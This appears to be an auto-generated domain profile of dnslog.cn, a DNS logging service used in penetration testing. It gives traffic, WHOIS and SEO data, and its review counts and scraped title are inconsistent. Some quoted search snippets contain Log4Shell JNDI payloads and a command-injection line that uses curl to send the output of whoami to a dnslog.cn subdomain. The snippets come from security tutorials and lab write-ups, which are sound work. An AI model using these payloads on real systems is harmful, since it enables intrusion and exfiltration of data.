Domain Summary

dnslog.cn

dnslog平台

Access denied | billing.ihor-hosting.ru used Cloudflare to restrict access

Global rank: #226704
Daily visitors: 11.19K
Monthly Visits: 335,846
Pageviews per user: 1.2
Registrar Abuse Contact Email:
Registrant Phone:
Rating
TLD: cn
IP Address: -
Organization: -
Category: Computers Electronics and Technology >
Computer Security
dnslog.cn Icon
dnslog.cn
Last Status:
Online
Last Updated: 12 day ago
loading

About Website

Click here to check amazing dnslog content for China. Otherwise, check out these important facts you probably never knew about dnslog.cn

dnslog平台

Visit dnslog.cnRight Arrow
Trust Score DNS Competitors Traffic SSL HTTP Headers WHOIS Reviews SEO

dnslog.cn Trust Score

dnslog.cn is probably legit as the trust score is reasonable. Our algorithm rated dnslog.cn a 84. Although our rating of dnslog.cn is medium to low risk, we encourage you to always vote as the evaluation of the site is done automatically.

The trust rating is high. Might be safe.
Trustscore
84 / 100

What is your feeling about dnslog.cn?

rating 10
rating 20
rating 31
rating 41
rating 51
4.0 / 5 Based on 3 Reviews
View/Add Comments

Which Sites are Alternatives & Competitors to dnslog.cn?

Explore the top alternatives and rivals of dnslog.cn in November 2024, and assess their data relating to website traffic, SEO, Web Server Information, and Whois. Refer to the list below for the best competitors of dnslog.cn, and simply click on each one to delve into their specific details.

Mentioned on Their Website:

  • dev.to
    Log4j Vulnerability Cheatsheet - DEV Community

    https://dev.to/therceman/log4j-vulnerability-cheatsheet-m39

    How It Works. Specially crafted payload is injected into Headers, Input Fields, or Query/Body parameters. You can use a service dnslog.cn to create your DNS subdomain for a test. Example: qwe3er.dnslog.cn. Use this subdomain to craft a payload and send it with the request. Check request to DNS service after some time for …

  • github.com
    log4j2burpscanner/README-zh-CN.md at main - GitHub

    https://github.com/f0ng/log4j2burpscanner/blob/main/README-zh-CN.md

    log4j2burpscanner. CVE-2021-44228,log4j2 burp插件 Java版本,dnslog选取了非dnslog.cn域名 效果如下:. 靶场的 (靶场比较慢,但是互联网资产是没问题的,原因应该在于靶场对于其他请求头的处理不好,或者请求头过大,导致靶场反应较慢,多等等即可). 试了两个SRC的站点 ...

  • superuser.com
    DNS incorrectly responds with 127.0.0.1 for dnslog.cn

    https://superuser.com/questions/1774385/dns-incorrectly-responds-with-127-0-0-1-for-dnslog-cn

    dnslog.cn seems to point to 127.0.0.1 no matter which public dns I use. Anything hosted at localhost seems to accessible at http://dnslog.cn . The behavior is …

  • dnslog.com.cn
    Dude Suite Web Security Tools

    http://www.dnslog.com.cn/

    提供了Base16~100、URL、ASCII、Unicode、ShellCode、Hex、MD5、SHA、SM3等近40种常见的编解码、加解密算法功能,并具备散列密码、JSON Web Token的解析破 …

  • cnblogs.com
    DNSLog进行无回显渗透测试 - Saint_Michael - 博客园

    https://www.cnblogs.com/miruier/p/15731807.html

    一、什么是DNSLog DNS的全称是Domain Name System(网络名称系统),它作为将域名和IP地址相互映射,使人更方便地访问互联网。当用户输入某一网址如www.baidu.com,网络上的DNS Server会将该域名解析,并找到对应的真实IP如127.0.0.1,使用户可以访问这台

  • blog.csdn.net
    log4j2 远程代码执行漏洞复现(CVE-2021-44228) - CSDN博客

    https://blog.csdn.net/Myon5/article/details/136548391

    漏洞简介 Apache Log4j2是一款Java日志框架,大量应用于业务系统开发。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞(CVE-2021-44228)。Apache Log4j2远程代码执行漏洞由Lookup功能引发。Log4j2在默认情况下会开启Lookup功能,用于将特殊值添加到日志中。

  • xz.aliyun.com
    如何利用DNSlog进行更高效率的无回显渗透 - 先知社区

    http://xz.aliyun.com/t/9747

    本文介绍了DNSlog的原理和应用,以及如何利用DNSlog进行更高效率的无回显渗透测试。DNSlog是存储在DNS服务器上的域名信息,可以用来注入和回显信息,绕过目标不显 …

  • github.com
    GitHub - killmonday/dnslogAutoVerify: 通过调用dnslog.cn实现无 …

    https://github.com/killmonday/dnslogAutoVerify

    通过调用dnslog.cn实现无回显漏洞批量验证. Contribute to killmonday/dnslogAutoVerify development by creating an account on GitHub.

  • m.freebuf.com
    FreeBuf网络安全行业门户

    https://m.freebuf.com/articles/web/259023.html

    域名知识:. 域名可以分为5级,从右向左解析,用 . 分割级别,低级别的域名要在高级别的域名中去解析,所以当security.gitw7c.dnslog.cn去gitw7c.dnslog.cn中去解析的时候,就会留下解析记录,通过获取前来解析的低级域名前缀来获取我们需要的信息. 由于每一级域名的 ...

  • cn-sec.com
    CVE-2023-38646 RCE漏洞(附EXP) | CN-SEC 中文网

    https://cn-sec.com/archives/1925299.html

    CVE-2023-38646 RCE漏洞(附EXP). Metabase 是一个开源数据分析平台,0.46.6.1 之前的开源 Metabase 和 1.46.6.1 之前的 Metabase Enterprise 允许未经身份验证的攻击者以服务器的权限级别在服务器上执行任意命令。. 此问题是由设置请求中的 JDBC url 攻击引起的,攻击者通过漏洞 ...

  • similarweb.com
    dnslog.cn Traffic Analytics, Ranking & Audience [May 2024]

    https://www.similarweb.com/website/dnslog.cn/

    dnslog.cn Website Traffic Demographics. Audience composition can reveal a site's current market share across various audiences. dnslog.cn's audience is 79.98% male and 20.02% female. The largest age group of visitors are 65+ year olds. Age Distribution.

  • cn-sec.com
    分享几个好用的在线DNSLOG网站 | CN-SEC 中文网

    https://cn-sec.com/archives/2633005.html

    我之前常用的dnslog网站是http://dnslog.cn/ ,但自从log4j漏洞出来后,各大公司都开始屏蔽这个网站,安全设备也会把这个网址加入恶意链接库中。 想要避免访 …

  • cnblogs.com
    DNSLOG | 利用总结 - sasdsaxvcx - 博客园

    https://www.cnblogs.com/J0ng/p/13378956.html

    现在很多漏洞都没有办法去回显,可是我们的payload已经执行,所以我们需要使用一些第三方的dnslog平台去验证我们的漏洞的存在性。. dnslog的利用方法主要涉及到以下几种漏洞的情况. 1 rce 2 ssrf 3 blind sql 4 ... 0x30 dnslog利用方式. 这里通过ceyo.io为例. 这里在作者 ...

  • similarweb.com
    dnslog.cn Competitors - Top Sites Like dnslog.cn | Similarweb

    https://www.similarweb.com/website/dnslog.cn/competitors/

    dnslog.cn's top 5 competitors in May 2024 are: ceye.io, dig.pm, fofa.info, freebuf.com, and more. According to Similarweb data of monthly visits, dnslog.cn’s top competitor in May 2024 is ceye.io with 22.9K visits. dnslog.cn 2nd most similar site is dig.pm, with 9K visits in May 2024, and closing off the top 3 is fofa.info with 798.9K.

  • blog.csdn.net
    DNSLog漏洞探测(四)之RCE漏洞实战_dnslog rce-CSDN博客

    https://blog.csdn.net/qq_64973687/article/details/134946328

    点击 Get SubDomain 获取一个子域名,这里我们获取到的子域名是 9fqvxt.dnslog.cn. 有关于RCE漏洞的DNSLog平台利用其实非常的简单,只需要在文本框去提交我们得到的子域名就好了. 点击 ping 提交 payload,以下是点击 ping 返回后的界面

  • typonotes.com
    掌控安全 SQL 注入靶场练习 - Dnslog 带外测试 | 老麦的书房

    https://typonotes.com/posts/2020/12/10/zkaq-sql-inject-by-dnslog/

    0x00.3 MySQL 自查询与函数. 不太好总结. concat() 返回的已经是一个字符串了, 因此,不需要在外层再加一次 单引号 。 load_file(str) 可以不需要与 select 互用执行。 使用 select 查询结果, 记得在外层加括号, 构建自查询 (select ...); 括号 太多, 注意闭合; 0x01 探测注入点. 探测是否存在 SQL 注入漏洞。

  • bleepingcomputer.com
    Hackers start pushing malware in worldwide Log4Shell attacks

    https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/

    The most common domains or IP addresses used as part of the scanning are/or data exfiltration campaigns are: interactsh.com burpcollaborator.net dnslog.cn bin${upper:a}ryedge.io leakix.net ...

  • cn-sec.com
    通过DNSLOG回显验证漏洞 | CN-SEC 中文网

    https://cn-sec.com/archives/794846.html

    包围着 whoami 的符号是反单引号,是 shift + ~ 组合打出来的符号,表示执行命令的意思,那么最终 ping 的结果就是 ping whoami执行后的主机名.随机三级域名.dnslog.cn ,解析的时候一层一层的迭代解析,最终指向 dnslog.cn 服务器上你的专属三级域名,并附带上执行结果 ...

  • agvenvironment.com
    Company History | AGV Environment in Malaysia, Singapore

    https://www.agvenvironment.com/about-us/company-history/

    AGV Environment is a multi-disciplinary consulting firm specializing in environmental, health and safety. The company has a group of senior environmental, health and safety …

  • dnslog.bczs.net
    DNSLog记录 - dnslog platform

    http://dnslog.bczs.net/

    你的子域名: 请先获取子域名 ->. 支持nslookup与http,如 http:// 请先获取子域名 -> /aaa. 如需更换自域名,请点击右上角。. 页面需手动刷新。. 严禁将本站用于非法用途. 公 …

  • github.com
    JNDIMap - GitHub

    https://github.com/X1r0z/JNDIMap

    JNDI 注入利用工具, 支持 RMI 和 LDAP 协议, 包含多种高版本 JDK 绕过方式 | A JNDI injection exploit tool that supports RMI and LDAP protocols, including a variety of methods to bypass higher-version JDK - X1r0z/JNDIMap

  • dnslog.cn
    DNSLog Platform

    http://www.dnslog.cn/

    DNS Query Record IP Address Created Time; No Data: Copyright © 2019 DNSLog.cn All Rights Reserved.

  • github.com
    Diverto/nse-log4shell - GitHub

    https://github.com/Diverto/nse-log4shell

    Note that NSE scripts will only issue the requests to the services. Nmap will not report vulnerable hosts, but you have to check DNS logs to determine vulnerability. If you do …

  • blog.csdn.net
    Log4j2 CVE-2021-44228漏洞经典复现超详细(vulhub靶场)_solr …

    https://blog.csdn.net/weixin_44862511/article/details/132131710

    本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。

  • rubicon-law.com
    About Us — Rubicon Law LLC

    https://www.rubicon-law.com/about-us

    We are a boutique corporate law practice with particular expertise in mergers and acquisitions and fundraising transactions.

  • xingye.me
    dnslog简单验证log4j2漏洞 - 星夜笔记本

    https://xingye.me/?p=444

    进dnslog:http://www.dnslog.cn/ Get SubDomain 得到一个随机的子域名 拼进${jndi:ldap://xxxxx.dnslog.cn/exp} 往任意可能在log中塞的输入填 这里 ...

  • cnblogs.com
    无回显的渗透技巧 - kinyoobi - 博客园

    https://www.cnblogs.com/kinyoobi/p/15415869.html

    1)打开dnslog.cn获得一个域名,访问777.cf1gbs.dnslog.cn,就会记录下来这个域名解析请求。 2)简单测试一下向目标服务器发起http请求,执行下面的命令. ip=|curl `whoami`.cf1gbs.dnslog.cn. 查看dnslog。 二、无回显代码执行 1、执行命令(需要站点目录 …

  • cn-sec.com
    使用DNSLOG获取漏洞的回显 | CN-SEC 中文网

    https://cn-sec.com/archives/246199.html

    针对不回显的命令注入漏洞,我们很难确定漏洞的存在并进一步利用,如17年9月爆发的Struts2-052反序列化命令执行漏洞是看不到任何回显的,针对这种情况,我们可以利用DNSLOG来获取命令的执行结果。. 这里使用已有的EXP来完成漏洞利用,EXP地址为. https://github.com ...

  • juejin.cn
    使用goby检测log4j漏洞 - 掘金

    https://juejin.cn/post/7066009612075401230

    Goby是通过golang编写的,而一些漏洞检测场景(比如dnslog验证),goby自身的JSON 格式无法满足这一需求,需采用 Golang 编写漏洞代码。. expJson部分. 1、首先通过goby poc管理,添加poc,按照goby官方漏洞描述模版说明填写并保存。. 图三:自定义poc. 2、在goby安装目录的 ...

  • blog.csdn.net
    DNSLog漏洞探测(五)之XXE漏洞实战_xxe dnslog-CSDN博客

    https://blog.csdn.net/qq_64973687/article/details/134948218

    首先我们先进入Pikachu靶场的XXE漏洞界面。. 首先,我们先打开DNSLog服务平台,点击 Get SubDomain 获取一个子域名,这里我们获取到的子域名是 adswfw.dnslog.cn。. 接下来我们只需要提交以下的payload,将其中的XXXXX部分替换为我们从DNSLog服务平台获取到的子域名就好了 ...

  • cn-sec.com
    dnslog平台+漏洞盲打合集 | CN-SEC 中文网

    https://cn-sec.com/archives/433443.html

    dnslog盲打. 平台分析: dnslog.link,命令执行漏洞的时候搞起ls命令记录起来很利索,比dnslog.cn快. http://admin.dnslog.link

  • cnblogs.com
    Apache Log4j2 CVE-2021-44228漏洞复现分析 - 仰望飞鸟的鱼

    https://www.cnblogs.com/Iitt1evegbird/p/15762261.html

    $ {jndi: ldap: //baidu.l3bkhz.dnslog.cn/xx} 漏洞分析. 这个漏洞是一个标准的JDNI注入,产生漏洞的原因是因为Context.lookup()的参数可控,导致程序请求攻击者的恶意服务器上的恶意类导致任意代码执行。 先定位一下调用栈

  • arstechnica.com
    The Internet’s biggest players are all affected by critical …

    https://arstechnica.com/information-technology/2021/12/the-critical-log4shell-zero-day-affects-a-whos-who-of-big-cloud-services/

    A critical vulnerability in the Log4j logging utility allows attackers to execute malicious code on servers and clients of popular services such as Apple, Amazon, …

  • infosecwriteups.com
    Log4j Vulnerability Cheatsheet - InfoSec Write-ups

    https://infosecwriteups.com/log4j-vulnerability-cheatsheet-66b7aeabc607

    1. You can use a service dnslog.cn to create your DNS subdomain for a test. Example: qwe3er.dnslog.cn. 2. Use this subdomain to craft a payload and send it …

See More

DNS Lookup

DNS entries, such as A, NS, MX, and TXT records, are crucial for the functioning of the Internet. The A record maps a domain name to an IPv4 address, while the NS record specifies authoritative name servers for a domain. The MX record identifies the mail server responsible for receiving email messages for a domain. Additionally, the TXT record allows for the association of any text information with a domain name. These records play a vital role in ensuring proper communication and connectivity across the internet.

N/A.

dnslog.cn Traffic Analysis

According to global rankings, dnslog.cn holds the position of #226704. It attracts an approximate daily audience of 11.19K visitors, leading to a total of 11307 pageviews. On a monthly basis, the website garners around 335.85K visitors.

Daily Visitors11.19K
Monthly Visits335.85K
Pages per Visit1.2
Visit Duration0:00:42
Bounce Rate84.06%
Want complete report?Full SEMrush Report >>
Daily Unique Visitors:
11194
Monthly Visits:
335846
Pages per Visit:
1.2
Daily Pageviews:
11307
Avg. visit duration:
0:00:42
Bounce rate:
84.06%
Monthly Visits (SEMrush):
338302

Traffic Sources

SourcesTraffic Share
Social:
0.00%
Paid Referrals:
2.51%
Mail:
0.00%
Search:
12.78%
Direct:
84.71%

Visitors by Country

CountryTraffic Share
China:
90.81%
Singapore:
2.72%
Hong Kong:
2.25%
Taiwan:
1.64%
Korea, Republic of:
1.11%

SSL Checker - SSL Certificate Verify

An SSL certificate is a digital certificate that ensures a secure encrypted connection between a web server and a user's browser. It provides authentication and encryption to keep data private and protected during transmission. dnslog.cn supports HTTPS, demonstrating their commitment to providing a secure browsing experience for users.

HTTP Headers

HTTP headers are additional segments of data exchanged between a client (e.g. a web browser) and a server during an HTTP request or response. They serve to provide instructions, metadata, or control parameters for the interaction between the client and server.

N/A.

Where is dnslog.cn hosted?

dnslog.cn is likely hosted in various data centers located across different regions worldwide. The current data center mentioned is just one of many where the website may be hosted.

Whois Information

WHOIS protocol used to get domain/IP info. Common for reg details, ownership of a domain/IP. Check dnslog.cn for reg/admin contact info, owner, org, email, phone, creation, and expiration dates.

Domain Updated Date:
Domain Created Date:
Domain Expiry Date:
Domain Name:
Registrar WHOIS Server:
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Registrar:
Domain Owner:

Domain Name: dnslog.cn

ROID: 20190201s10001s09781759-cn

Registrant: 王亚东

Registrant Contact Email: [email protected]

Sponsoring Registrar: 阿里云计算有限公司(万网)

Name Server: ns2.dnslog.cn

Registration Time: 2019-02-01 10:23:08

Expiration Time: 2029-02-01 10:23:08

SEO Analysis

SEO analysis involves examining the performance of a website, including titles, descriptions, keywords, and website speed. It also includes identifying popular keywords and researching competitor websites to understand their strategies. The analysis aims to optimize the website's visibility and improve its ranking on search engines.

Title Tag:
Access denied | billing.ihor-hosting.ru used Cloudflare to restrict access

Length: 74 characters

What is the issue about?
Pages have title length greater than 70 characters. If the title is too long, it might be truncated or ignored by Search Engines. Keep it relevant and not too long.

How to fix?
Change the title length to be less than 70 characters. Make it unique and relevant to best describe the page content.

Meta Description:

No meta description found.

Length: 0 characters

When crafting website descriptions, keep in mind that search engines only show the first 150-160 characters in search results. To ensure your entire description is visible, aim for a length of 25-160 characters. If your description is too long, it may get cut off. Conversely, if it's too short, search engines may add text from elsewhere on your page. Additionally, search engines may modify the description you provide to better match the user's search intent. It's best to strike a balance between brevity and relevance for optimal visibility.

Meta Keywords:

No meta keywords found.

In the realm of search engine optimization, the meta keywords tag has become a relic of the past due to its potential for misuse, ultimately leading major search engines to disregard it in their ranking algorithms.

Keywords Cloud:
Term Count Density
cloudflare 3 8.11%
access 3 8.11%
ray 2 5.41%
website 2 5.41%
ihor-hosting 2 5.41%
denied 2 5.41%
billing 2 5.41%
page 1 2.70%
accessing 1 2.70%
address 1 2.70%
helpful 1 2.70%
feedback 1 2.70%
security 1 2.70%
performance 1 2.70%
reveal 1 2.70%
click 1 2.70%
asn 1 2.70%
autonomous 1 2.70%
error 1 2.70%
cookies 1 2.70%
enable 1 2.70%
restrict 1 2.70%
utc 1 2.70%
happened 1 2.70%
system 1 2.70%
banned 1 2.70%
owner 1 2.70%
number 1 2.70%

A crucial factor in search engine optimization is keyword density, which refers to the proportion of a particular keyword present in the text of a webpage. In order to achieve high rankings on search engine results pages, it is essential to maintain the appropriate keyword density for your primary keyword.

Headings:
<H1>
0
<H2>
2
<H3>
0
<H4>
0
<H5>
0
<H6>
0
<h2>What happened?</h2>
<h2>Access denied</h2>

In SEO, the primary focus is placed on keywords within the content. The title of the page holds the highest importance, followed by heading tags such as h1, h2, and h3. The h1 heading should be the largest on the page, while the h2 heading should be slightly smaller, and the h3 heading even smaller. This hierarchical structure is crucial for optimizing search engine rankings.

Image Alt Attribute:
5 images found in your page, and 5 images are without "ALT" text.

What is the issue about?
The tag does not have an ALT attribute defined. As a general rule, search engines do not interpret the content of image files. The text provided in the attribute enables the site owner to provide relevant information to the search engine and to the end user. Alt text is helpful to end users if they have images disabled or if the image does not properly load. In addition, the Alt text is utilized by screen readers. Make sure that your Alt text is descriptive and accurately reflects what the image represents and supports the content on the page.

How to fix?
Use the <img alt> attribute to write descriptive content for the image: <img source='pic.gif' alt='Accurate and descriptive keyword text that represents the image.' />.

Website Speed Test (Desktop):
27.56 seconds

Website speed is a measurement of how fast the content on your page loads. Website speed is one of many factors involved in the discipline of search engine optimization (SEO), but it is not the only one. In a recent study, the average load time for a web page was 3.21s.

Top Organic Search Terms:
Term Search Volume Traffic Traffic (%)
dnslog 70 0 0%

CO-Hosted

CoHosted refers to a situation where multiple domain names (websites) are using the same IP address to point to their respective web servers. They could be owned by different individuals or organizations and may serve entirely different purposes.

People reviews about dnslog.cn

Very positive reviews

rating 5

Total reviews: 2
Average score: 5 stars

The total score is based on reviews found on the following sites
Scamadviser: 5/5 stars, 2 reviews

Add your review

rating 1 rating 2 rating 3 rating 4 rating 5

Very positive reviews

rating 5

Total reviews: 2
Average score: 5 stars

The total score is based on reviews found on the following sites
Scamadviser: 5/5 stars, 2 reviews


Back Top
Feedback